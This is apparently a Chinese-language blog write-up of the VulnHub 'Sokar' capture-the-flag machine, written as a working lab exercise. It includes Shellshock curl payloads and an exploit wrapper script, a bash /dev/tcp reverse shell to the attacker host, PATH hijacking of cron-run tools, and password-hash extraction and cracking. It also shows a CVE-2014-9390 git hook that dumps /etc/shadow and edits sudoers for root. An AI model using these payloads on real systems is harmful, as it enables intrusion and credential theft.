tick.Tack

Sokar

SokarVulnhub2015年第一次競賽中使用的機器,作者是Rasta Mouse


先用nmap掃瞄一遍目標機器,發現在591 port有架http server

Starting Nmap 6.46 ( http://nmap.org ) at 2015-01-01 09:57 EST
Nmap scan report for 192.168.2.154
Host is up (0.00058s latency).
Not shown: 65534 filtered ports
PORT    STATE SERVICE VERSION
591/tcp open  http    Apache httpd 2.2.15 ((CentOS))
MAC Address: 08:00:27:F2:40:DB (Cadmus Computer Systems)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1187.08 seconds

連上 http://192.168.2.154:591 之後,首頁出現了這台機器的資訊,看起來是跑了date、uptime、netstat和iostat的結果

F5多刷幾次會發現這個狀態是每分鐘更新一次,猜測應該有用crontab跑排程

再看一下網頁原始碼,知道是跑這支cgi程式 http://192.168.2.154:591/cgi-bin/cat

對於再來要做甚麼有點沒頭緒,直接來試試去年很夯的Shellshock

root@kali:~/_Sec/sokar# curl -A "() { :; }; echo \"Content-type: text/plain\"; echo; echo; /bin/ls /home;" http://192.168.2.154:591/cgi-bin/cat                 
apophis
bynarr

..隨便就矇中啦XD!寫個script讓操作可以輕鬆點

root@kali:~/_Sec/sokar# cat exp.sh
#!/bin/bash

shopt -s extglob
usr_bin='+(id|whoami|wget|uptime)' #執行檔的路徑要自己設定

while [ 1 -gt 0 ]
do

echo -n "[apache@sokar] " #假裝自己是個shell...
read cmd

prefix="/bin/"
bin=`echo $cmd | awk '{print $1}'`
case $bin in
$usr_bin)
    prefix="/usr/bin/";;
esac

final_cmd=$prefix$cmd

line="() { :; }; echo \"Content-type: text/plain\"; echo; $final_cmd;"
curl -A "$line" http://192.168.2.154:591/cgi-bin/cat


done

先來看看/cgi-bin/cat到底做了哪些事情

[apache@sokar] cat cat
#!/bin/bash

echo "Content-type: text/html";
echo ""

/bin/cat << EOM
<pre>
EOM

echo `date`
echo `uptime`
echo "<br />"
/bin/cat /tmp/stats

/bin/cat << EOM
</pre>
EOM

他即時執行了date和uptime,看起來netstat和iostat的資訊就是排程執行後存在/tmp/stats裡面

[apache@sokar] cat /tmp/stats
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address               Foreign Address             State
tcp        0      0 192.168.2.154:36163         192.168.2.128:51242         CLOSE_WAIT
tcp        0      0 192.168.2.154:35913         192.168.2.128:51242         CLOSE_WAIT
tcp        0      0 192.168.2.154:36490         192.168.2.128:51242         CLOSE_WAIT
tcp        0      0 192.168.2.154:36186         192.168.2.128:51242         CLOSE_WAIT
tcp        0      0 192.168.2.154:36789         192.168.2.128:51242         CLOSE_WAIT
tcp        0      0 192.168.2.154:35907         192.168.2.128:51242         CLOSE_WAIT
tcp        0      0 :::591                      :::*                        LISTEN
tcp        0      0 ::ffff:192.168.2.154:591    ::ffff:192.168.2.128:52364  TIME_WAIT
tcp        0      0 ::ffff:192.168.2.154:591    ::ffff:192.168.2.128:52363  TIME_WAIT
tcp        0      0 ::ffff:192.168.2.154:591    ::ffff:192.168.2.128:52367  TIME_WAIT
tcp        0      0 ::ffff:192.168.2.154:591    ::ffff:192.168.2.128:52366  TIME_WAIT
udp        0      0 0.0.0.0:68                  0.0.0.0:*
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node Path
unix  9      [ ]         DGRAM                    8239   /dev/log
unix  2      [ ACC ]     STREAM     LISTENING     6863   @/com/ubuntu/upstart
unix  2      [ ]         DGRAM                    7006   @/org/kernel/udev/udevd
unix  2      [ ]         DGRAM                    49323
unix  2      [ ]         DGRAM                    37526
unix  2      [ ]         DGRAM                    36381
unix  2      [ ]         DGRAM                    26496
unix  2      [ ]         DGRAM                    26128
unix  2      [ ]         DGRAM                    9264
unix  2      [ ]         DGRAM                    8406
unix  3      [ ]         DGRAM                    7022
unix  3      [ ]         DGRAM                    7021

Linux 2.6.32-504.1.3.el6.x86_64 (sokar)         02/28/2015      _x86_64_        (1 CPU)

avg-cpu:  %user   %nice %system %iowait  %steal   %idle
          39.39    0.00   29.65    0.04    0.00   30.92

Device:            tps   Blk_read/s   Blk_wrtn/s   Blk_read   Blk_wrtn
sda               1.00        29.04        20.94    1922802    1386464
sdb               0.01         0.04         0.01       2710        754

繼續找找這台機器上其他的資訊,找到了/var/spool/mail/bynarr,得到了bynarr的密碼”fruity”,並且知道bynarr可以連結外部的51242 port

[apache@sokar]: cat /var/spool/mail/bynarr
Return-Path: <root@sokar>
Delivered-To: bynarr@localhost
Received:  from root by localhost
To: <bynarr@sokar>
Date: Thu, 13 Nov 2014 22:04:31 +0100
Subject: Welcome

Dear Bynarr.  Welcome to Sokar Inc. Forensic Development Team.
A user account has been setup for you.

UID 500 (bynarr)
GID 500 (bynarr)
        501 (forensic)

Password 'fruity'.  Please change this ASAP.
Should you require, you've been granted outbound ephemeral port access on 51242, to transfer non-sensitive forensic dumps out for analysis.

All the best in your new role!

  -Sokar-

再研究一下bynarr的家目錄(/home/bynarr),會發現.bash_profile有一行

PATH=.:$PATH:$HOME/bin

bynarr的家目錄被設成PATH的第一順位

接下來嘗試看看能不能在家目錄用同名的程式來取代原本列出狀態用的程式(netstat和iostat)

[apache@sokar]: echo "#!/bin/bash" > /home/bynarr/netstat
[apache@sokar]: echo "echo netstat" >> /home/bynarr/netstat
[apache@sokar]: echo "#!/bin/bash" > /home/bynarr/iostat
[apache@sokar]: echo "echo iostat" >> /home/bynarr/iostat
[apache@sokar]: chmod +x /home/bynarr/netstat
[apache@sokar]: chmod +x /home/bynarr/iostat

建完檔案等排程時間到了之後再重整一下首頁,就會發現iostat被替換成自己建立的偽‧iostat

再來就要靠這個偽‧iostat來取得bynarr的reverse shell

先在Kali上面監聽51242這個port後,再去修改一下/home/bynarr/iostat的內容

[apache@sokar] echo "!#/bin/bash" > /home/bynarr/iostat
[apache@sokar] echo "/bin/bash -i >& /dev/tcp/192.168.2.128/51242 0>&1" >> /home/bynarr/iostat

等排程時間一到,就拿到bynarr的shell了

root@kali:~/_Sec/sokar# nc -lvp 51242
listening on [any] 51242 ...
192.168.2.154: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.2.128] from (UNKNOWN) [192.168.2.154] 36824
bash: no job control in this shell
[bynarr@sokar ~]$

拿到bynarr的shell之後,先來看一下他有沒有sudo的權限

[bynarr@sokar ~]$ sudo -l
sudo -l
Matching Defaults entries for bynarr on this host:
    !requiretty, visiblepw, always_set_home, env_reset, env_keep="COLORS
    DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
    PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
    LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
 
User bynarr may run the following commands on this host:
    (ALL) NOPASSWD: /home/bynarr/lime

執行lime時可以選擇要掛載或卸除lime.ko的核心模組,這邊就直接掛載上去

[bynarr@sokar ~]$ sudo /home/bynarr/lime
sudo /home/bynarr/lime
==========================
Linux Memory Extractorator
==========================
LKM, add or remove?
> remove
[bynarr@sokar ~]$ sudo /home/bynarr/lime
sudo /home/bynarr/lime
==========================
Linux Memory Extractorator
==========================
LKM, add or remove?
> add

lime掛載上去後,會把記憶體dump到/tmp/ram,而看起來/tmp/ram的內容還有一些可讀的字串

來看看能不能從這些字串中得到其他使用者的資訊

[bynarr@sokar tmp]$ strings ram | grep apophis
strings ram | grep apophis
apophis:$6$0HQCZwUJ$rYYSk9SeqtbKv3aEe3kz/RQdpcka8K.2NGpPveVrE5qpkgSLTtE.Hvg0egWYcaeTYau11ahsRAWRDdT8jPltH.:16434:0:99999:7:::
[bynarr@sokar tmp]$ strings ram | grep "root:"
strings ram | grep "root:"
root:$6$cWQYjirZ$rADNjUFSiHmYp.UVdt4WYlmALhMXdkg9//9yuodQ2TFfiEWlAO0J6PRKesEfvu.3dfDb.7gTGgl/jesvFWs7l0:16434:0:99999:7:::

拿到了疑似密碼hash,餵給john解

root@kali:~/_Sec/sokar# john --wordlist=/usr/share/wordlists/rockyou.txt password 
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt" Use the "--format=crypt"
option to force loading these as that type instead Loaded 2 password hashes with 2 different salts
(sha512crypt [64/64])
 
overdrive (apophis)

接著來登入apophis

[bynarr@sokar ~]$ su apophis
su apophis
standard in must be a tty
[bynarr@sokar ~]$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
[bynarr@sokar ~]$ su apophis
su apophis
Password: overdrive

[apophis@sokar bynarr]$

在apophis的家目錄裡面發現一個程式(build)。擁有者是root,而且設有sticky bit,看起來非常可疑,直接執行看看

[apophis@sokar ~]$ ./build
./build
Build? (Y/N) Y
Y
Cloning into '/mnt/secret-project'...
ssh: Could not resolve hostname sokar-dev: Name or service not known
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.

拿去餵狗後會發現是git的錯誤訊息,主因是找不到sokar-dev這個hostname

想說能不能輕鬆改個/etc/hosts連回攻擊端,不過只有root有寫入權限,只好想想其他辦法

找半天終於找到/etc/resolv.conf有可寫的權限,看來是要自己架一個DNS server和git repository了

參考這個影片把DNS server架起來之後,因為不知道git要抓哪個路徑下的repository,先回sokar跑一次build看會不會再噴錯誤

[apophis@sokar ~]$ ./build
./build
Build? (Y/N) Y
Y
Cloning into '/mnt/secret-project'...
The authenticity of host 'sokar-dev (192.168.2.128)' can't be established.
RSA key fingerprint is d8:38:99:c5:d1:a1:ea:e7:48:cc:bc:d1:ad:bf:76:9c.
Are you sure you want to continue connecting (yes/no)? yes
yes
Warning: Permanently added 'sokar-dev,192.168.2.128' (RSA) to the list of known hosts.
root@sokar-dev's password: ###########

fatal: '/root/secret-project' does not appear to be a git repository
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.

回Kali把repository建起來

mkdir /root/secret-project
cd /root/secret-project
git init

從sokar再執行一次build就能成功clone repository了

[apophis@sokar ~]$ ./build
./build
Build? (Y/N) Y
Y
Cloning into '/mnt/secret-project'...
root@sokar-dev's password: ###########

warning: You appear to have cloned an empty repository.
Checking connectivity... done.

做到這裡又卡住一陣子,最後靠google git exploit找到一個git的bug(CVE-2014-9390)

但是要運用這個bug的前提是:檔案系統不會區分大小寫(case insensitive)

先來看看/mnt/secret-project所在的檔案系統

[apophis@sokar secret-project]$ mount
mount
/dev/sda1 on / type ext4 (rw)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
tmpfs on /dev/shm type tmpfs (rw)
/dev/sdb1 on /mnt type vfat (rw,uid=501,gid=502)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)

vfat是case insensitive的系統! 接著就是實作的部分了!

先回Kali建個測試用的檔案

root@kali:~/secret-project# mkdir .GiT
root@kali:~/secret-project# cd .GiT/
root@kali:~/secret-project/.GiT# mkdir hooks
root@kali:~/secret-project/.GiT# cd hooks/
root@kali:~/secret-project/.GiT/hooks# cat post-checkout
#!/bin/bash
cat /etc/shadow

將post-checkout設定成可執行後把新增的內容commit進repository

root@kali:~/secret-project/.GiT/hooks# chmod +x post-checkout
root@kali:~/secret-project/.GiT/hooks# cd ..
root@kali:~/secret-project/.GiT# cd ..
root@kali:~/secret-project# git add .GiT
root@kali:~/secret-project# git commit -m "CVE-2014-9390"
[master (root-commit) 7523455] CVE-2014-9390
 Committer: root <root@localhost.localdomain>
Your name and email address were configured automatically based
on your username and hostname. Please check that they are accurate.
You can suppress this message by setting them explicitly:

    git config --global user.name "Your Name"
    git config --global user.email you@example.com

After doing this, you may fix the identity used for this commit with:

    git commit --amend --reset-author

 1 file changed, 2 insertions(+)
 create mode 100755 .GiT/hooks/post-checkout

回到sokar,把之前產生的repo砍掉後再跑一次build

[apophis@sokar ~]$ rm -rf /mnt/secret-project
rm -rf /mnt/secret-project
[apophis@sokar ~]$ ./build
./build
Build? (Y/N) Y
Y
Cloning into '/mnt/secret-project'...
root@sokar-dev's password: ##########

remote: Counting objects: 5, done.
remote: Total 5 (delta 0), reused 0 (delta 0)
Receiving objects: 100% (5/5), done.
Checking connectivity... done.
root:$6$cWQYjirZ$rADNjUFSiHmYp.UVdt4WYlmALhMXdkg9//9yuodQ2TFfiEWlAO0J6PRKesEfvu.3dfDb.7gTGgl/jesvFWs7l0:16434:0:99999:7:::
bin:*:15628:0:99999:7:::
daemon:*:15628:0:99999:7:::
adm:*:15628:0:99999:7:::
lp:*:15628:0:99999:7:::
sync:*:15628:0:99999:7:::
shutdown:*:15628:0:99999:7:::
halt:*:15628:0:99999:7:::
mail:*:15628:0:99999:7:::
uucp:*:15628:0:99999:7:::
operator:*:15628:0:99999:7:::
games:*:15628:0:99999:7:::
gopher:*:15628:0:99999:7:::
ftp:*:15628:0:99999:7:::
nobody:*:15628:0:99999:7:::
vcsa:!!:16386::::::
saslauth:!!:16386::::::
postfix:!!:16386::::::
sshd:!!:16386::::::
bynarr:$6$UVZfMym7$9FFtl9Ky3ABFGErQlpQsKNOmAycJn4MlSRVHsSgVupDstQOifqqu3LvGwf3wmBvmfvh0IslwMo4/mhZ3qnVrM/:16434:0:99999:7:::
apache:!!:16386::::::
apophis:$6$0HQCZwUJ$rYYSk9SeqtbKv3aEe3kz/RQdpcka8K.2NGpPveVrE5qpkgSLTtE.Hvg0egWYcaeTYau11ahsRAWRDdT8jPltH.:16434:0:99999:7:::

成功讀取到/etc/shadow!再來只要修改post-checkout的執行內容就能拿到root了

本來想說寫一個suid的程式讓post-checkout去編譯,寫到一半想到直接去改/etc/sudoers讓apophis得到全部的權限就可以了

echo "apophis   ALL=(ALL:ALL) ALL" >> /etc/sudoers

修改完post-checkout後再回到sokar重新build過之後就來試試嶄新的sudo

[apophis@sokar ~]$ sudo /bin/bash
sudo /bin/bash
[sudo] password for apophis: overdrive

[root@sokar apophis]# id
id
uid=0(root) gid=0(root) groups=0(root)
[root@sokar apophis]# cat /root/flag
cat /root/flag
                0   0
                |   |
            ____|___|____
         0  |~ ~ ~ ~ ~ ~|   0
         |  |   Happy   |   |
      ___|__|___________|___|__
      |/\/\/\/\/\/\/\/\/\/\/\/|
  0   |    B i r t h d a y    |   0
  |   |/\/\/\/\/\/\/\/\/\/\/\/|   |
 _|___|_______________________|___|__
|/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/|
|                                   |
|     V  u  l  n  H  u  b   ! !     |
| ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ |
|___________________________________|

=====================================
| Congratulations on beating Sokar! |
|                                   |
|  Massive shoutout to g0tmi1k and  |
| the entire community which makes  |
|         VulnHub possible!         |
|                                   |
|    rasta_mouse (@_RastaMouse)     |
=====================================